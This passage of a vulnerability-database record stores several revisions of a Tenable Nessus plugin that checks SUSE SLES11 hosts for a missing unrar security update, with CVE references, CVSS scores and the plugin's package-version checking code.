Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2018-04-04T00:00:00", "modified": "2018-12-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=108828", "reporter": "Tenable", "references": ["https://www.suse.com/security/cve/CVE-2017-12938/", "https://www.suse.com/security/cve/CVE-2012-6706/", "https://bugzilla.suse.com/show_bug.cgi?id=1046882", "https://bugzilla.suse.com/show_bug.cgi?id=513804", "https://www.suse.com/security/cve/CVE-2017-12940/", "http://www.nessus.org/u?183f5d82", "https://bugzilla.suse.com/show_bug.cgi?id=1054038", "https://bugzilla.suse.com/show_bug.cgi?id=693890", "https://www.suse.com/security/cve/CVE-2017-12941/", "https://www.suse.com/security/cve/CVE-2017-12942/"], "cvelist": ["CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942", "CVE-2012-6706"], "immutableFields": [], "lastseen": "2019-02-21T01:37:57", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"modified": "2019-02-21T01:37:57", "references": [{"idList": ["GLSA-201708-05", "GLSA-201804-16", "GLSA-201710-21", "GLSA-201709-24"], "type": "gentoo"}, {"idList": ["CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942", "CVE-2012-6706"], "type": "cve"}, {"idList": ["OPENSUSE-SU-2017:1797-1", "SUSE-SU-2018:0809-1", "SUSE-SU-2018:0863-1", "SUSE-SU-2017:1745-1", "OPENSUSE-SU-2018:0825-1", "SUSE-SU-2017:1760-1", "SUSE-SU-2017:1716-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310874227", "OPENVAS:1361412562310875200", "OPENVAS:1361412562310874188", "OPENVAS:1361412562310851575", "OPENVAS:1361412562310851727", "OPENVAS:1361412562310891003", "OPENVAS:1361412562310811258"], "type": "openvas"}, {"idList": ["EDB-ID:44402"], "type": "exploitdb"}, {"idList": ["ALAS-2018-976"], "type": "amazon"}, {"idList": ["GENTOO_GLSA-201709-24.NASL", "OPENSUSE-2017-724.NASL", "DEBIAN_DLA-1003.NASL", "OPENSUSE-2017-779.NASL", "SUSE_SU-2017-1745-1.NASL", "SUSE_SU-2017-1763-1.NASL", "SUSE_SU-2017-1716-1.NASL", "GENTOO_GLSA-201710-21.NASL", "GENTOO_GLSA-201708-05.NASL", "SUSE_SU-2017-1760-1.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DLA-1003-1:FD9FD"], "type": "debian"}]}, "score": {"modified": "2019-02-21T01:37:57", "value": 7.4, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "108828", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0862-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108828);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/01 13:19:04\");\n\n script_cve_id(\"CVE-2012-6706\", \"CVE-2017-12938\", \"CVE-2017-12940\", \"CVE-2017-12941\", \"CVE-2017-12942\");\n\n script_name(english:\"SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=513804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=693890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6706/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12938/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12940/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12941/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12942/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180862-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?183f5d82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-unrar-13542=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! ereg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"unrar-5.6.1-5.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unrar\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:11"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2019-02-21T01:37:57", "differentElements": ["cvss", "cvss3", "description", "href", "modified", "reporter", "sourceData"], "edition": 2}, {"bulletin": {"id": "SUSE_SU-2018-0862-1.NASL", "hash": "e53947b0a7a093f91845b5421e639bd2c3bc3417acc1e904392a3ade487b2383", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)", "description": "This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2018-04-04T00:00:00", "modified": "2020-06-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/108828", "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2017-12938/", "https://www.suse.com/security/cve/CVE-2012-6706/", "https://bugzilla.suse.com/show_bug.cgi?id=1046882", "https://bugzilla.suse.com/show_bug.cgi?id=513804", "https://www.suse.com/security/cve/CVE-2017-12940/", "http://www.nessus.org/u?183f5d82", "https://bugzilla.suse.com/show_bug.cgi?id=1054038", "https://bugzilla.suse.com/show_bug.cgi?id=693890", "https://www.suse.com/security/cve/CVE-2017-12941/", "https://www.suse.com/security/cve/CVE-2017-12942/"], "cvelist": ["CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942", "CVE-2012-6706"], "immutableFields": [], "lastseen": "2020-06-01T04:26:16", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"modified": "2020-06-01T04:26:16", "references": [{"idList": ["GLSA-201708-05", "GLSA-201804-16", "GLSA-201710-21", "GLSA-201709-24"], "type": "gentoo"}, {"idList": ["EXPLOITPACK:AE476E9F8D29EFD3EB8A7650FA8A0572"], "type": "exploitpack"}, {"idList": ["CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942", "CVE-2012-6706"], "type": "cve"}, {"idList": ["OPENSUSE-SU-2017:1797-1", "SUSE-SU-2018:0809-1", "SUSE-SU-2018:0863-1", "SUSE-SU-2017:1745-1", "OPENSUSE-SU-2018:0825-1", "SUSE-SU-2017:1760-1", "SUSE-SU-2017:1716-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310874227", "OPENVAS:1361412562310875200", "OPENVAS:1361412562310874188", "OPENVAS:1361412562310851575", "OPENVAS:1361412562310851727", "OPENVAS:1361412562310891003", "OPENVAS:1361412562310811258"], "type": "openvas"}, {"idList": ["EDB-ID:44402"], "type": "exploitdb"}, {"idList": ["ALAS-2018-976"], "type": "amazon"}, {"idList": ["GENTOO_GLSA-201709-24.NASL", "OPENSUSE-2017-724.NASL", "DEBIAN_DLA-1003.NASL", "OPENSUSE-2017-779.NASL", "SUSE_SU-2017-1745-1.NASL", "SUSE_SU-2017-1763-1.NASL", "SUSE_SU-2017-1716-1.NASL", "GENTOO_GLSA-201710-21.NASL", "GENTOO_GLSA-201708-05.NASL", "SUSE_SU-2017-1760-1.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DLA-1003-1:FD9FD"], "type": "debian"}], "rev": 2}, "score": {"modified": "2020-06-01T04:26:16", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "108828", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0862-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108828);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2012-6706\", \"CVE-2017-12938\", \"CVE-2017-12940\", \"CVE-2017-12941\", \"CVE-2017-12942\");\n\n script_name(english:\"SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=513804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=693890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6706/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12938/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12940/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12941/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12942/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180862-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?183f5d82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-unrar-13542=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"unrar-5.6.1-5.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unrar\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:11"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-06-01T04:26:16", "differentElements": ["modified", "reporter", "sourceData"], "edition": 3}, {"bulletin": {"id": "SUSE_SU-2018-0862-1.NASL", "hash": "c90b0d1e8ed8cd8d2922d0cb67823b6697858d86fd40580df7f1422edcdf249a", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)", "description": "This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2018-04-04T00:00:00", "modified": "2018-04-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/108828", "reporter": "This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2017-12938/", "https://www.suse.com/security/cve/CVE-2012-6706/", "https://bugzilla.suse.com/show_bug.cgi?id=1046882", "https://bugzilla.suse.com/show_bug.cgi?id=513804", "https://www.suse.com/security/cve/CVE-2017-12940/", "http://www.nessus.org/u?183f5d82", "https://bugzilla.suse.com/show_bug.cgi?id=1054038", "https://bugzilla.suse.com/show_bug.cgi?id=693890", "https://www.suse.com/security/cve/CVE-2017-12941/", "https://www.suse.com/security/cve/CVE-2017-12942/"], "cvelist": ["CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942", "CVE-2012-6706"], "immutableFields": [], "lastseen": "2020-09-23T18:22:05", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2020-09-23T18:22:05", "references": [{"idList": ["GLSA-201708-05", "GLSA-201804-16", "GLSA-201710-21", "GLSA-201709-24"], "type": "gentoo"}, {"idList": ["ASA-201803-14"], "type": "archlinux"}, {"idList": ["FEDORA:06420604AF9F", "FEDORA:682846030B04", "FEDORA:F0C3560EA463"], "type": "fedora"}, {"idList": ["EXPLOITPACK:AE476E9F8D29EFD3EB8A7650FA8A0572"], "type": "exploitpack"}, {"idList": ["CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942", "CVE-2012-6706"], "type": "cve"}, {"idList": ["OPENSUSE-SU-2017:1797-1", "SUSE-SU-2018:0809-1", "SUSE-SU-2018:0863-1", "SUSE-SU-2017:1745-1", "OPENSUSE-SU-2018:0825-1", "SUSE-SU-2017:1760-1", "SUSE-SU-2017:1716-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310874227", "OPENVAS:1361412562310875200", "OPENVAS:1361412562310874188", "OPENVAS:1361412562310851575", "OPENVAS:1361412562310851727", "OPENVAS:1361412562310891003", "OPENVAS:1361412562310811258"], "type": "openvas"}, {"idList": ["EDB-ID:44402"], "type": "exploitdb"}, {"idList": ["ALAS-2018-976"], "type": "amazon"}, {"idList": ["GENTOO_GLSA-201709-24.NASL", "OPENSUSE-2017-724.NASL", "DEBIAN_DLA-1003.NASL", "OPENSUSE-2017-779.NASL", "SUSE_SU-2017-1745-1.NASL", "SUSE_SU-2017-1763-1.NASL", "SUSE_SU-2017-1716-1.NASL", "GENTOO_GLSA-201710-21.NASL", "GENTOO_GLSA-201708-05.NASL", "SUSE_SU-2017-1760-1.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DLA-1003-1:FD9FD"], "type": "debian"}], "rev": 2}, "score": {"modified": "2020-09-23T18:22:05", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "108828", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0862-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108828);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2012-6706\", \"CVE-2017-12938\", \"CVE-2017-12940\", \"CVE-2017-12941\", \"CVE-2017-12942\");\n\n script_name(english:\"SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=513804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=693890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6706/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12938/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12940/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12941/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12942/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180862-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?183f5d82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-unrar-13542=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 